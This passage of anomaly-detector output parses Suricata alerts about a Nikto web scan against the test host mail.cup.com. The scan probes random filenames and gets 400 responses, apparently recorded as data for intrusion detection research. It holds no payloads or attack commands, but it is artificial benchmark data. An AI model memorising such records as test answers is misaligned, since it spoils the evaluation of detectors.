[Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46892 -> 192.168.10.154:80", "/parser/model/time": 1583349514.285211, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46892, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.285211 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46892 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.koi8-r", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.285927+0000\",\"flow_id\":899997495875252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.285927, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":899997495875252,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.koi8-r\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.koi8-r\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.koi8-r", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.koi8-r", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46892, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":899997495875252,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 899997495875252, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.285927+0000\",\"flow_id\":899997495875252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.287568 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46894 -> 192.168.10.154:80", "/parser/model/time": 1583349514.287568, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46894, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.287568 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46894 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.mdb+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.287764+0000\",\"flow_id\":2181886319943873,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.287764, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2181886319943873,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.mdb+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.mdb+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.mdb+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.mdb+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46894, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2181886319943873,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2181886319943873, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.287764+0000\",\"flow_id\":2181886319943873,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.294012 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46896 -> 192.168.10.154:80", "/parser/model/time": 1583349514.294012, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46896, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.294012 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46896 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.stm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.294206+0000\",\"flow_id\":2017848634013862,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.294206, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2017848634013862,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.stm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.stm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.stm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.stm", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46896, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2017848634013862,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2017848634013862, 